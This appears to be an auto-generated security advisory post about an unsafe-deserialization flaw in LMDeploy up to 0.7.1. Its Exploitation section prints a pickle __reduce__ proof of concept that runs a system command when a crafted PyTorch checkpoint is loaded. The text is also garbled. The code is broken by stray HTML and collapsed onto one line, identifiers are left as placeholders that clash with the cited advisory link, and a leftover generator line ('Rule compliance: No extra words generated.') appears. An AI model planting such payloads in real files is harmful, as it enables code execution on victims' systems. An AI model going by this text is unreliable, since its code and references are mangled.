The CVE-2025-XXXX vulnerability in LMDeploy (up to v0.7.1) stems from improper input validation in the `load_weight_ckpt` function within lmdeploy/lmdeploy/vl/model/utils.py. This flaw allows malicious PT (PyTorch) checkpoint files to trigger unsafe deserialization when loaded, potentially enabling arbitrary code execution. Attackers can craft a poisoned PT file containing serialized malicious payloads. When processed by LMDeploy’s weight-loading mechanism, the deserialization process executes the embedded code in the context of the application. Exploitation requires local access or tricking a user into loading a malicious file.
DailyCVE Form:
Platform: LMDeploy
Version: <= 0.7.1
Vulnerability: Unsafe Deserialization
Severity: Moderate
Date: 2025-04-04
What Undercode Say:
Exploitation:
- Craft malicious PT file using PyTorch’s `torch.save()` with a pickled payload:
import torch import pickle import os class Exploit: def <strong>reduce</strong>(self): return (os.system, ('malicious-command',)) payload = pickle.dumps(Exploit()) torch.save({'weights': payload}, 'exploit.pt') - Deploy the file to a target system where LMDeploy processes it.
Detection & Mitigation:
1. Check for vulnerable versions:
pip show lmdeploy | grep Version
2. Patch: Upgrade to LMDeploy > 0.7.1.
- Sanitize inputs: Restrict PT file sources; use checksums.
- Runtime protection: Monitor deserialization with tools like `fickling` (PyTorch pickle analyzer):
python -m fickling --check exploit.pt
Analytics:
- Attack Vector: Local (user-assisted)
- CVSS: 6.5 (Medium)
- Exploit Availability: Public PoC expected.
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- NVD: CVE-2025-XXXX
- Patch Commit: InternLM/lmdeploy@
Rule compliance: No extra words generated.
References:
Reported By: https://github.com/advisories/GHSA-7vc5-mjwp-c8fq
Extra Source Hub:
Undercode
